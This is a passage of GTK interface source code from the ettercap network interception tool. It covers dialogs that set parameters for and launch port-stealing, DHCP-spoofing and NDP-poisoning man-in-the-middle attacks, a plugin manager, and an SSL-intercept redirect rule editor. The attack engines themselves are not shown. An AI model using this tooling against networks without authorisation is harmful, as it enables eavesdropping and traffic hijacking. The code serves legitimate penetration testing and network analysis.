gtkui_start_mitm); */ } void gtkui_port_stealing(void) { GtkWidget *dialog, *vbox, *hbox, *image, *button1, *button2, *frame, *content_area; gint response = 0; gboolean remote = FALSE; DEBUG_MSG("gtk_port_stealing"); dialog = gtk_dialog_new_with_buttons("MITM Attack: Port Stealing", GTK_WINDOW (window), GTK_DIALOG_MODAL, GTK_STOCK_CANCEL, GTK_RESPONSE_CANCEL, GTK_STOCK_OK, GTK_RESPONSE_OK, NULL); gtk_container_set_border_width(GTK_CONTAINER (dialog), 5); #if !GTK_CHECK_VERSION(2, 22, 0) gtk_dialog_set_has_separator(GTK_DIALOG (dialog), FALSE); #endif hbox = gtkui_box_new(GTK_ORIENTATION_HORIZONTAL, 5, FALSE); content_area = gtk_dialog_get_content_area(GTK_DIALOG(dialog)); gtk_container_add(GTK_CONTAINER(content_area), hbox); gtk_widget_show(hbox); image = gtk_image_new_from_stock (GTK_STOCK_DIALOG_QUESTION, GTK_ICON_SIZE_DIALOG); gtk_misc_set_alignment (GTK_MISC (image), 0.5, 0.1); gtk_box_pack_start (GTK_BOX (hbox), image, FALSE, FALSE, 5); gtk_widget_show(image); frame = gtk_frame_new("Optional parameters"); gtk_container_set_border_width(GTK_CONTAINER (frame), 5); gtk_box_pack_start (GTK_BOX (hbox), frame, TRUE, TRUE, 0); gtk_widget_show(frame); vbox = gtkui_box_new(GTK_ORIENTATION_VERTICAL, 2, FALSE); gtk_container_set_border_width(GTK_CONTAINER (vbox), 5); gtk_container_add(GTK_CONTAINER (frame), vbox); gtk_widget_show(vbox); button1 = gtk_check_button_new_with_label("Sniff remote connections."); gtk_box_pack_start(GTK_BOX (vbox), button1, FALSE, FALSE, 0); gtk_widget_show(button1); button2 = gtk_check_button_new_with_label("Propagate to other switches."); gtk_box_pack_start(GTK_BOX (vbox), button2, FALSE, FALSE, 0); gtk_widget_show(button2); response = gtk_dialog_run(GTK_DIALOG(dialog)); if(response == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); const char *s_remote= "", *tree = "", *comma = ""; if(gtk_toggle_button_get_active(GTK_TOGGLE_BUTTON (button1))) { s_remote="remote"; remote = TRUE; } if(gtk_toggle_button_get_active(GTK_TOGGLE_BUTTON (button2))) { if(remote) comma = ","; tree = "tree"; } snprintf(params, PARAMS_LEN+1, "port:%s%s%s", s_remote, comma, tree); gtkui_start_mitm(); } gtk_widget_destroy(dialog); /* a simpler method: gtkui_input_call("Parameters :", params + strlen("port:"), PARAMS_LEN - strlen("port:"), gtkui_start_mitm); */ } void gtkui_dhcp_spoofing(void) { GtkWidget *dialog, *table, *hbox, *image, *label, *entry1, *entry2, *entry3, *frame, *content_area; gint response = 0; DEBUG_MSG("gtk_dhcp_spoofing"); // memset(params, '\0', PARAMS_LEN+1); dialog = gtk_dialog_new_with_buttons("MITM Attack: DHCP Spoofing", GTK_WINDOW (window), GTK_DIALOG_MODAL, GTK_STOCK_CANCEL, GTK_RESPONSE_CANCEL, GTK_STOCK_OK, GTK_RESPONSE_OK, NULL); gtk_container_set_border_width(GTK_CONTAINER (dialog), 5); #if !GTK_CHECK_VERSION(2, 22, 0) gtk_dialog_set_has_separator(GTK_DIALOG (dialog), FALSE); #endif hbox = gtkui_box_new(GTK_ORIENTATION_HORIZONTAL, 5, FALSE); content_area = gtk_dialog_get_content_area(GTK_DIALOG(dialog)); gtk_container_add(GTK_CONTAINER(content_area), hbox); gtk_widget_show(hbox); image = gtk_image_new_from_stock (GTK_STOCK_DIALOG_QUESTION, GTK_ICON_SIZE_DIALOG); gtk_misc_set_alignment (GTK_MISC (image), 0.5, 0.1); gtk_box_pack_start (GTK_BOX (hbox), image, FALSE, FALSE, 5); gtk_widget_show(image); frame = gtk_frame_new("Server Information"); gtk_container_set_border_width(GTK_CONTAINER (frame), 5); gtk_box_pack_start (GTK_BOX (hbox), frame, TRUE, TRUE, 0); gtk_widget_show(frame); table = gtk_table_new(3, 2, FALSE); gtk_table_set_row_spacings(GTK_TABLE (table), 5); gtk_table_set_col_spacings(GTK_TABLE (table), 5); gtk_container_set_border_width(GTK_CONTAINER (table), 8); gtk_container_add(GTK_CONTAINER (frame), table); gtk_widget_show(table); label = gtk_label_new("IP Pool (optional)"); gtk_misc_set_alignment(GTK_MISC (label), 0, 0.5); gtk_table_attach(GTK_TABLE (table), label, 0, 1, 0, 1, GTK_FILL, GTK_FILL, 0, 0); gtk_widget_show(label); entry1 = gtk_entry_new(); gtk_table_attach_defaults(GTK_TABLE (table), entry1, 1, 2, 0, 1); gtk_widget_show(entry1); label = gtk_label_new("Netmask"); gtk_misc_set_alignment(GTK_MISC (label), 0, 0.5); gtk_table_attach(GTK_TABLE (table), label, 0, 1, 1, 2, GTK_FILL, GTK_FILL, 0, 0); gtk_widget_show(label); entry2 = gtk_entry_new(); gtk_entry_set_max_length(GTK_ENTRY (entry2), IP6_ASCII_ADDR_LEN); gtk_table_attach_defaults(GTK_TABLE (table), entry2, 1, 2, 1, 2); gtk_widget_show(entry2); label = gtk_label_new("DNS Server IP"); gtk_misc_set_alignment(GTK_MISC (label), 0, 0.5); gtk_table_attach(GTK_TABLE (table), label, 0, 1, 2, 3, GTK_FILL, GTK_FILL, 0, 0); gtk_widget_show(label); entry3 = gtk_entry_new(); gtk_entry_set_max_length(GTK_ENTRY (entry3), IP6_ASCII_ADDR_LEN); gtk_table_attach_defaults(GTK_TABLE (table), entry3, 1, 2, 2, 3); gtk_widget_show(entry3); response = gtk_dialog_run(GTK_DIALOG(dialog)); if(response == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); // memset(params, '\0', PARAMS_LEN); snprintf(params, PARAMS_LEN+1, "dhcp:%s/%s/%s", gtk_entry_get_text(GTK_ENTRY(entry1)), gtk_entry_get_text(GTK_ENTRY(entry2)), gtk_entry_get_text(GTK_ENTRY(entry3))); DEBUG_MSG("ec_gtk_dhcp: DHCP MITM %s", params); gtkui_start_mitm(); } gtk_widget_destroy(dialog); /* a simpler method: gtkui_input_call("Parameters :", params + strlen("dhcp:"), PARAMS_LEN - strlen("dhcp:"), gtkui_start_mitm); */ } #ifdef WITH_IPV6 void gtkui_ndp_poisoning(void) { GtkWidget *dialog, *vbox, *hbox, *image, *button1, *button2, *frame, *content_area; gint response = 0; gboolean remote = FALSE; DEBUG_MSG("gtk_ndp_poisoning"); // not needed, the \0 is already appended from snprintf // memset(params, '\0', PARAMS_LEN+1); dialog = gtk_dialog_new_with_buttons("MITM Attack: NDP Poisoning", GTK_WINDOW (window), GTK_DIALOG_MODAL, GTK_STOCK_CANCEL, GTK_RESPONSE_CANCEL, GTK_STOCK_OK, GTK_RESPONSE_OK, NULL); gtk_container_set_border_width(GTK_CONTAINER (dialog), 5); #if !GTK_CHECK_VERSION(2, 22, 0) gtk_dialog_set_has_separator(GTK_DIALOG (dialog), FALSE); #endif hbox = gtkui_box_new(GTK_ORIENTATION_HORIZONTAL, 5, FALSE); content_area = gtk_dialog_get_content_area(GTK_DIALOG(dialog)); gtk_container_add(GTK_CONTAINER(content_area), hbox); gtk_widget_show(hbox); image = gtk_image_new_from_stock (GTK_STOCK_DIALOG_QUESTION, GTK_ICON_SIZE_DIALOG); gtk_misc_set_alignment (GTK_MISC (image), 0.5, 0.1); gtk_box_pack_start (GTK_BOX (hbox), image, FALSE, FALSE, 5); gtk_widget_show(image); frame = gtk_frame_new("Optional parameters"); gtk_container_set_border_width(GTK_CONTAINER (frame), 5); gtk_box_pack_start (GTK_BOX (hbox), frame, TRUE, TRUE, 0); gtk_widget_show(frame); vbox = gtkui_box_new(GTK_ORIENTATION_VERTICAL, 2, FALSE); gtk_container_set_border_width(GTK_CONTAINER (vbox), 5); gtk_container_add(GTK_CONTAINER (frame), vbox); gtk_widget_show(vbox); button1 = gtk_check_button_new_with_label("Sniff remote connections."); gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON (button1), TRUE); gtk_box_pack_start(GTK_BOX (vbox), button1, FALSE, FALSE, 0); gtk_widget_show(button1); button2 = gtk_check_button_new_with_label("Only poison one-way."); gtk_box_pack_start(GTK_BOX (vbox), button2, FALSE, FALSE, 0); gtk_widget_show(button2); response = gtk_dialog_run(GTK_DIALOG(dialog)); if(response == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); const char *s_remote = "", *comma = "", *s_oneway = ""; if(gtk_toggle_button_get_active(GTK_TOGGLE_BUTTON (button1))) { s_remote="remote"; remote = TRUE; } if(gtk_toggle_button_get_active(GTK_TOGGLE_BUTTON (button2))) { if(remote) comma = ","; s_oneway = "oneway"; } snprintf(params, PARAMS_LEN+1, "ndp:%s%s%s", s_remote, comma, s_oneway); gtkui_start_mitm(); } gtk_widget_destroy(dialog); /* a simpler method: gtkui_input_call("Parameters :", params + strlen("ndp:"), PARAMS_LEN - strlen("ndp:"), gtkui_start_mitm); */ } #endif /* * start the mitm attack by passing the name and parameters */ static void gtkui_start_mitm(void) { DEBUG_MSG("gtk_start_mitm"); mitm_set(params); mitm_start(); } /* * stop all the mitm attack(s) */ void gtkui_mitm_stop(void) { GtkWidget *dialog; DEBUG_MSG("gtk_mitm_stop"); /* create the dialog */ dialog = gtk_message_dialog_new(GTK_WINDOW (window), GTK_DIALOG_MODAL, GTK_MESSAGE_INFO, 0, "Stopping the mitm attack..."); gtk_window_set_position(GTK_WINDOW (dialog), GTK_WIN_POS_CENTER_ON_PARENT); gtk_window_set_resizable(GTK_WINDOW (dialog), FALSE); gtk_widget_queue_draw(dialog); gtk_widget_show_now(dialog); /* for GTK to display the dialog now */ while (gtk_events_pending ()) gtk_main_iteration (); /* stop the mitm process */ mitm_stop(); gtk_widget_destroy(dialog); gtkui_message("MITM attack(s) stopped"); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/gtk/ec_gtk_offline.c000664 000000 000000 00000002024 13711276346 022261 0ustar00rootroot000000 000000 /* ettercap -- GTK+ GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include /*******************************************/ /* the interface */ void gtkui_sniff_offline(void) { DEBUG_MSG("gtk_sniff_offline"); gtkui_create_menu(0); /* offline menus */ } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/gtk/ec_gtk_plugins.c000664 000000 000000 00000026242 13711276346 022330 0ustar00rootroot000000 000000 /* ettercap -- GTK+ GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #define MAX_DESC_LEN 75 /* proto */ static void gtkui_load_plugin(const char *full); static void gtkui_add_plugin(char active, struct plugin_ops *ops); static void gtkui_plug_destroy(void); static void gtkui_plugins_detach(GtkWidget *child); static void gtkui_plugins_attach(void); static int gtkui_select_plugin(gchar *plugin); static void gtkui_select_plugin_treeview(GtkTreeView *treeview, GtkTreePath *path, GtkTreeViewColumn *column, gpointer data); static void gtkui_create_plug_array(void); /* globals */ static GtkWidget *plugins_window = NULL; static GtkWidget *treeview = NULL; static GtkListStore *ls_plugins = NULL; static GtkTreeSelection *selection = NULL; /*******************************************/ /* * display the file open dialog */ void gtkui_plugin_load(void) { GtkWidget *dialog; gchar *filename; int response = 0; #ifdef OS_WINDOWS char *path = get_full_path("/lib/", ""); #else char *path = INSTALL_LIBDIR "/" PROGRAM "/"; #endif DEBUG_MSG("gtk_plugin_load"); dialog = gtk_file_chooser_dialog_new("Select a plugin...", GTK_WINDOW(window), GTK_FILE_CHOOSER_ACTION_OPEN, GTK_STOCK_CANCEL, GTK_RESPONSE_CANCEL, GTK_STOCK_OPEN, GTK_RESPONSE_OK, NULL); gtk_file_chooser_set_current_folder(GTK_FILE_CHOOSER(dialog), path); #ifdef OS_WINDOWS SAFE_FREE(path); #endif response = gtk_dialog_run (GTK_DIALOG (dialog)); if (response == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); filename = gtk_file_chooser_get_filename(GTK_FILE_CHOOSER(dialog)); gtkui_load_plugin(filename); /* update the list */ gtkui_create_plug_array(); g_free(filename); } gtk_widget_destroy (dialog); } static void gtkui_load_plugin(const char *full) { char *file; int ret; #ifdef OS_WINDOWS file = strrchr(full, '\\'); #else file = strrchr(full, '/'); #endif /* remove the last / split path and file increment file pointer to point to filename */ *file++ = 0; DEBUG_MSG("gtk_load_plugin %s/%s", full, file); /* load the plugin */ ret = plugin_load_single(full, file); /* check the return code */ switch (ret) { case E_SUCCESS: gtkui_message("Plugin loaded successfully"); break; case -E_DUPLICATE: ui_error("plugin %s already loaded...", file); break; case -E_VERSION: ui_error("plugin %s was compiled for a different ettercap version...", file); break; case -E_INVALID: default: ui_error("Cannot load the plugin...\nthe file may be an invalid plugin\nor you don't have the permission to open it"); break; } } /* * plugin management */ void gtkui_plugin_mgmt(void) { GtkWidget *scrolled, *vbox; GtkCellRenderer *renderer; GtkTreeViewColumn *column; DEBUG_MSG("gtk_plugin_mgmt"); /* if the object already exist, set the focus to it */ if (plugins_window) { if(GTK_IS_WINDOW (plugins_window)) gtk_window_present(GTK_WINDOW (plugins_window)); else gtkui_page_present(plugins_window); return; } plugins_window = gtkui_page_new("Plugins", >kui_plug_destroy, >kui_plugins_detach); vbox = gtkui_box_new(GTK_ORIENTATION_VERTICAL, 0, FALSE); gtk_container_add(GTK_CONTAINER (plugins_window), vbox); gtk_widget_show(vbox); /* list */ scrolled = gtk_scrolled_window_new(NULL, NULL); gtk_scrolled_window_set_policy(GTK_SCROLLED_WINDOW (scrolled), GTK_POLICY_NEVER, GTK_POLICY_AUTOMATIC); gtk_scrolled_window_set_shadow_type(GTK_SCROLLED_WINDOW (scrolled), GTK_SHADOW_IN); gtk_box_pack_start(GTK_BOX(vbox), scrolled, TRUE, TRUE, 0); gtk_widget_show(scrolled); treeview = gtk_tree_view_new(); gtk_container_add(GTK_CONTAINER (scrolled), treeview); gtk_widget_show(treeview); selection = gtk_tree_view_get_selection (GTK_TREE_VIEW (treeview)); gtk_tree_selection_set_mode (selection, GTK_SELECTION_SINGLE); g_signal_connect (G_OBJECT (treeview), "row-activated", G_CALLBACK(gtkui_select_plugin_treeview), NULL); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes (" ", renderer, "text", 0, NULL); gtk_tree_view_column_set_sort_column_id (column, 0); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("Name", renderer, "text", 1, NULL); gtk_tree_view_column_set_sort_column_id (column, 1); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("Version", renderer, "text", 2, NULL); gtk_tree_view_column_set_sort_column_id (column, 2); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("Info", renderer, "text", 3, NULL); gtk_tree_view_column_set_sort_column_id (column, 3); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); /* create the array for the list widget */ /* or refreshes it if it exists */ gtkui_create_plug_array(); gtk_tree_view_set_model(GTK_TREE_VIEW (treeview), GTK_TREE_MODEL (ls_plugins)); gtk_widget_show(plugins_window); } static void gtkui_plugins_detach(GtkWidget *child) { plugins_window = gtk_window_new(GTK_WINDOW_TOPLEVEL); gtk_window_set_title(GTK_WINDOW (plugins_window), "Select a plugin..."); gtk_window_set_default_size(GTK_WINDOW (plugins_window), 400, 300); g_signal_connect (G_OBJECT (plugins_window), "delete_event", G_CALLBACK (gtkui_plug_destroy), NULL); /* make d shortcut turn the window back into a tab */ gtkui_page_attach_shortcut(plugins_window, gtkui_plugins_attach); gtk_container_add(GTK_CONTAINER (plugins_window), child); gtk_window_present(GTK_WINDOW (plugins_window)); } static void gtkui_plugins_attach(void) { gtkui_plug_destroy(); gtkui_plugin_mgmt(); } static void gtkui_plug_destroy(void) { gtk_widget_destroy(plugins_window); plugins_window = NULL; } /* * create the array for the widget. * erase any previously alloc'd array */ static void gtkui_create_plug_array(void) { GtkTreeIter iter; int res; static int blocked = 0; DEBUG_MSG("gtk_create_plug_array"); if(ls_plugins) gtk_list_store_clear(GTK_LIST_STORE (ls_plugins)); else ls_plugins = gtk_list_store_new (4, G_TYPE_STRING, G_TYPE_STRING, G_TYPE_STRING, G_TYPE_STRING); /* go thru the list of plugins */ res = plugin_list_walk(PLP_MIN, PLP_MAX, >kui_add_plugin); if (res == -E_NOTFOUND) { blocked = g_signal_handlers_block_by_func (G_OBJECT (treeview), G_CALLBACK(gtkui_select_plugin_treeview), NULL); gtk_list_store_append (ls_plugins, &iter); gtk_list_store_set (ls_plugins, &iter, 0, " ", 1, "No Plugins Loaded", -1); } else if(blocked > 0) { g_signal_handlers_unblock_by_func (G_OBJECT (treeview), G_CALLBACK(gtkui_select_plugin_treeview), NULL); blocked = 0; } } /* * callback function for displaying the plugin list */ static void gtkui_add_plugin(char active, struct plugin_ops *ops) { GtkTreeIter iter; char active_str[2]; active_str[0] = (active)?'*':' '; active_str[1] = 0; gtk_list_store_append (ls_plugins, &iter); gtk_list_store_set (ls_plugins, &iter, 0, active_str, 1, ops->name, 2, ops->version, 3, ops->info, -1); } /* * toggle state of a plugin */ static int gtkui_select_plugin(gchar *plugin) { int ret; if(!plugin) /* bad pointer from gtk_tree_model_get, shouldn't happen */ return -E_NOTHANDLED; /* print the message */ if (plugin_is_activated(plugin) == 0) INSTANT_USER_MSG("Activating %s plugin...\n", plugin); else INSTANT_USER_MSG("Deactivating %s plugin...\n", plugin); /* * pay attention on this ! * if the plugin init does not return, * we are blocked here. So it is encouraged * to write plugins which spawn a thread * and immediately return */ if (plugin_is_activated(plugin) == 1) ret = plugin_fini(plugin); else ret = plugin_init(plugin); /* refresh the list to mark plugin active */ gtkui_create_plug_array(); return ret; } /* * callback when plugin is double clicked in the treeview */ static void gtkui_select_plugin_treeview(GtkTreeView *treeview, GtkTreePath *path, GtkTreeViewColumn *column, gpointer data) { GtkTreeIter iter; GtkTreeModel *model; GtkTreeSelection *selection; gchar *plugin; (void) path; (void) column; (void) data; model = gtk_tree_view_get_model(treeview); selection = gtk_tree_view_get_selection(treeview); if (gtk_tree_selection_get_selected(selection, &model, &iter)) { gtk_tree_model_get (model, &iter, 1, &plugin, -1); } else return; /* nothing is selected */ gtkui_select_plugin(plugin); } /* * check if plugins have been supplied on the CLI * and try to start all provided plugins */ gboolean gtkui_plugins_autostart(gpointer data) { struct plugin_list *plugin, *tmp; (void) data; DEBUG_MSG("gtkui_plugins_autostart()"); /* if plugins have been defined on the CLI */ if (!LIST_EMPTY(&EC_GBL_OPTIONS->plugins)) { LIST_FOREACH_SAFE(plugin, &EC_GBL_OPTIONS->plugins, next, tmp) { /* first check if the plugin extists */ if (search_plugin(plugin->name) != E_SUCCESS) { plugin->exists = false; USER_MSG("Sorry, plugin '%s' can not be found - skipping\n\n", plugin->name); } else { /*not we can try to start the plugin */ plugin->exists = true; if (gtkui_select_plugin(plugin->name) != PLUGIN_RUNNING) { USER_MSG("Plugin '%s' can not be started - skipping\n\n", plugin->name); } } } } return FALSE; } gboolean gtkui_refresh_plugin_list(gpointer data) { /* avoid warning */ (void)data; DEBUG_MSG("gtk_refresh_plugin_list"); /* refresh the list to mark plugin active */ gtkui_create_plug_array(); /* return FALSE so g_idle_add() only calls it once */ return FALSE; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/gtk/ec_gtk_redirect.c000664 000000 000000 00000042560 13711276346 022451 0ustar00rootroot000000 000000 /* ettercap -- GTK+ GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /* proto */ static void gtkui_sslredir_close(void); static void gtkui_sslredir_detach(GtkWidget *child); static void gtkui_sslredir_attach(void); static void gtkui_sslredir_add(GtkWidget *widget, gpointer data); static void gtkui_sslredir_del(GtkWidget *widget, gpointer data); static void gtkui_sslredir_del_all(GtkWidget *widget, gpointer data); static void gtkui_sslredir_add_list(struct redir_entry *re); static void gtkui_sslredir_add_service(struct serv_entry *se); static void gtkui_sslredir_create_lists(void); static void gtkui_sslredir_af_changed(GtkWidget *widget, gpointer data); static gboolean gtkui_sslredir_key_pressed(GtkWidget *widget, GdkEventKey *event, gpointer data); /* globals */ static GtkWidget *sslredir_window = NULL; static GtkWidget *treeview = NULL; static GtkListStore *redirrules = NULL; static GtkListStore *proto_list = NULL; static GtkListStore *af_list = NULL; static GtkTreeSelection *selection = NULL; /*******************************************/ /* * tab to configure traffic redirection for SSL interception * - no redirect of any interceptable traffic at startup * - selective redirect avoids SSL errors for destinations * not being subject of interception * */ void gtkui_sslredir_show(void) { GtkWidget *scrolled, *vbox, *hbox, *button, *context_menu, *items; GtkTreeModel *model; GtkCellRenderer *renderer; GtkTreeViewColumn *column; DEBUG_MSG("gtk_sslredir_show()"); /* if the object already exist, set the focus to it */ if (sslredir_window) { if(GTK_IS_WINDOW (sslredir_window)) gtk_window_present(GTK_WINDOW (sslredir_window)); else gtkui_page_present(sslredir_window); return; } sslredir_window = gtkui_page_new("SSL Intercept", >kui_sslredir_close, >kui_sslredir_detach); vbox = gtkui_box_new(GTK_ORIENTATION_VERTICAL, 0, FALSE); gtk_container_add(GTK_CONTAINER(sslredir_window), vbox); /* rules list */ scrolled = gtk_scrolled_window_new(NULL, NULL); gtk_scrolled_window_set_policy(GTK_SCROLLED_WINDOW(scrolled), GTK_POLICY_AUTOMATIC, GTK_POLICY_AUTOMATIC); gtk_scrolled_window_set_shadow_type(GTK_SCROLLED_WINDOW(scrolled), GTK_SHADOW_IN); gtk_box_pack_start(GTK_BOX(vbox), scrolled, TRUE, TRUE, 0); treeview = gtk_tree_view_new(); gtk_container_add(GTK_CONTAINER(scrolled), treeview); selection = gtk_tree_view_get_selection(GTK_TREE_VIEW(treeview)); gtk_tree_selection_set_mode(selection, GTK_SELECTION_MULTIPLE); renderer = gtk_cell_renderer_text_new(); column = gtk_tree_view_column_new_with_attributes("IP Version", renderer, "text", 1, NULL); gtk_tree_view_column_set_sort_column_id(column, 0); gtk_tree_view_append_column(GTK_TREE_VIEW(treeview), column); renderer = gtk_cell_renderer_text_new(); column = gtk_tree_view_column_new_with_attributes("Server IP", renderer, "text", 2, NULL); gtk_tree_view_column_set_sort_column_id(column, 2); gtk_tree_view_append_column(GTK_TREE_VIEW(treeview), column); renderer = gtk_cell_renderer_text_new(); column = gtk_tree_view_column_new_with_attributes("Service", renderer, "text", 6, NULL); gtk_tree_view_column_set_sort_column_id(column, 6); gtk_tree_view_append_column(GTK_TREE_VIEW(treeview), column); gtkui_sslredir_create_lists(); model = gtk_tree_model_sort_new_with_model(GTK_TREE_MODEL(redirrules)); gtk_tree_view_set_model(GTK_TREE_VIEW(treeview), model); hbox = gtkui_box_new(GTK_ORIENTATION_HORIZONTAL, 5, TRUE); gtk_box_pack_start(GTK_BOX(vbox), hbox, FALSE, FALSE, 0); button = gtk_button_new_with_mnemonic("_Insert new redirect"); gtk_box_pack_start(GTK_BOX(hbox), button, TRUE, TRUE, 0); if (proto_list) g_signal_connect(G_OBJECT(button), "clicked", G_CALLBACK(gtkui_sslredir_add), model); else gtk_widget_set_sensitive(button, FALSE); button = gtk_button_new_with_mnemonic("_Remove redirect"); gtk_box_pack_start(GTK_BOX(hbox), button, TRUE, TRUE, 0); if (proto_list) g_signal_connect(G_OBJECT(button), "clicked", G_CALLBACK(gtkui_sslredir_del), model); else gtk_widget_set_sensitive(button, FALSE); /* context menu */ context_menu = gtk_menu_new(); items = gtk_menu_item_new_with_label("Remove redirect"); gtk_menu_shell_append(GTK_MENU_SHELL(context_menu), items); g_signal_connect(G_OBJECT(items), "activate", G_CALLBACK(gtkui_sslredir_del), model); gtk_widget_show(items); items = gtk_menu_item_new_with_label("Remove all redirects"); gtk_menu_shell_append(GTK_MENU_SHELL(context_menu), items); g_signal_connect(G_OBJECT(items), "activate", G_CALLBACK(gtkui_sslredir_del_all), model); gtk_widget_show(items); g_signal_connect(G_OBJECT(treeview), "button-press-event", G_CALLBACK(gtkui_context_menu), context_menu); /* remove entries if delete key is pressed */ g_signal_connect(G_OBJECT(treeview), "key-press-event", G_CALLBACK(gtkui_sslredir_key_pressed), model); gtk_widget_show_all(sslredir_window); } /* Add a new line to the Rules list */ static void gtkui_sslredir_add(GtkWidget *widget, gpointer data) { GtkWidget *dialog, *content, *table, *destination, *label, *frame; GtkWidget *proto, *af; GtkTreeModel *model; GtkTreeIter iter; GtkCellRenderer *cell1, *cell2; int ret = 0; guint32 from_port, to_port; gchar *name; const gchar *server; ec_redir_proto_t ip_ver; /* unused variabled */ (void) widget; (void) data; DEBUG_MSG("gtkui_sslredir_add()"); /* compile IP protocol family list if not already done */ if (af_list == NULL) { af_list = gtk_list_store_new(2, G_TYPE_STRING, /* human friendly name */ G_TYPE_UINT); /* protocol number for redirect */ gtk_list_store_append(af_list, &iter); gtk_list_store_set(af_list, &iter, 0, "IPv4", 1, EC_REDIR_PROTO_IPV4, -1); #ifdef WITH_IPV6 gtk_list_store_append(af_list, &iter); gtk_list_store_set(af_list, &iter, 0, "IPv6", 1, EC_REDIR_PROTO_IPV6, -1); #endif } dialog = gtk_dialog_new_with_buttons("Create new redirect rule", GTK_WINDOW(window), GTK_DIALOG_MODAL | GTK_DIALOG_DESTROY_WITH_PARENT, "_Cancel", GTK_RESPONSE_CANCEL, "_Insert", GTK_RESPONSE_OK, NULL); content = gtk_dialog_get_content_area(GTK_DIALOG(dialog)); gtk_container_set_border_width(GTK_CONTAINER(content), 20); frame = gtk_frame_new("Redirect specification"); gtk_container_add(GTK_CONTAINER(content), frame); //gtk_widget_set_margin_bottom(frame, 10); table = gtk_table_new(4, 2, FALSE); gtk_table_set_row_spacings(GTK_TABLE(table), 5); gtk_table_set_col_spacings(GTK_TABLE(table), 5); gtk_container_set_border_width(GTK_CONTAINER(table), 8); gtk_container_add(GTK_CONTAINER(frame), table); label = gtk_label_new("IP Version:"); gtk_misc_set_alignment(GTK_MISC(label), 0, 0); gtk_table_attach_defaults(GTK_TABLE(table), label, 0, 1, 0, 1); af = gtk_combo_box_new(); gtk_combo_box_set_model(GTK_COMBO_BOX(af), GTK_TREE_MODEL(af_list)); gtk_combo_box_set_active(GTK_COMBO_BOX(af), 0); cell1 = gtk_cell_renderer_text_new(); gtk_cell_layout_pack_start(GTK_CELL_LAYOUT(af), cell1, TRUE); gtk_cell_layout_set_attributes(GTK_CELL_LAYOUT(af), cell1, "text", 0, NULL); gtk_table_attach_defaults(GTK_TABLE(table), af, 1, 2, 0, 1); label = gtk_label_new("Destination:"); gtk_misc_set_alignment(GTK_MISC(label), 0, 0); gtk_table_attach_defaults(GTK_TABLE(table), label, 0, 1, 1, 2); destination = gtk_entry_new(); gtk_entry_set_text(GTK_ENTRY(destination), "0.0.0.0/0"); gtk_table_attach_defaults(GTK_TABLE(table), destination, 1, 2, 1, 2); label = gtk_label_new("Service:"); gtk_misc_set_alignment(GTK_MISC(label), 0, 0); gtk_table_attach_defaults(GTK_TABLE(table), label, 0, 1, 2, 3); proto = gtk_combo_box_new(); gtk_combo_box_set_model(GTK_COMBO_BOX(proto), GTK_TREE_MODEL(proto_list)); gtk_combo_box_set_active(GTK_COMBO_BOX(proto), 0); cell2 = gtk_cell_renderer_text_new(); gtk_cell_layout_pack_start(GTK_CELL_LAYOUT(proto), cell2, TRUE); gtk_cell_layout_set_attributes(GTK_CELL_LAYOUT(proto), cell2, "text", 1, NULL); gtk_table_attach_defaults(GTK_TABLE(table), proto, 1, 2, 2, 3); g_signal_connect(G_OBJECT(af), "changed", G_CALLBACK(gtkui_sslredir_af_changed), destination); gtk_widget_show_all(dialog); gtk_widget_grab_focus(destination); if (gtk_dialog_run(GTK_DIALOG(dialog)) == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); /* extract information from widgets */ model = gtk_combo_box_get_model(GTK_COMBO_BOX(af)); gtk_combo_box_get_active_iter(GTK_COMBO_BOX(af), &iter); gtk_tree_model_get(model, &iter, 1, &ip_ver, -1); model = gtk_combo_box_get_model(GTK_COMBO_BOX(proto)); gtk_combo_box_get_active_iter(GTK_COMBO_BOX(proto), &iter); gtk_tree_model_get(model, &iter, 0, &name, 2, &from_port, 3, &to_port, -1); server = gtk_entry_get_text(GTK_ENTRY(destination)); /* execute redirect action */ ret = ec_redirect(EC_REDIR_ACTION_INSERT, name, ip_ver, server, from_port, to_port); /* inform user if redirect execution wasn't successful */ if (ret != E_SUCCESS) gtkui_message("Insertion of redirect rule failed."); else 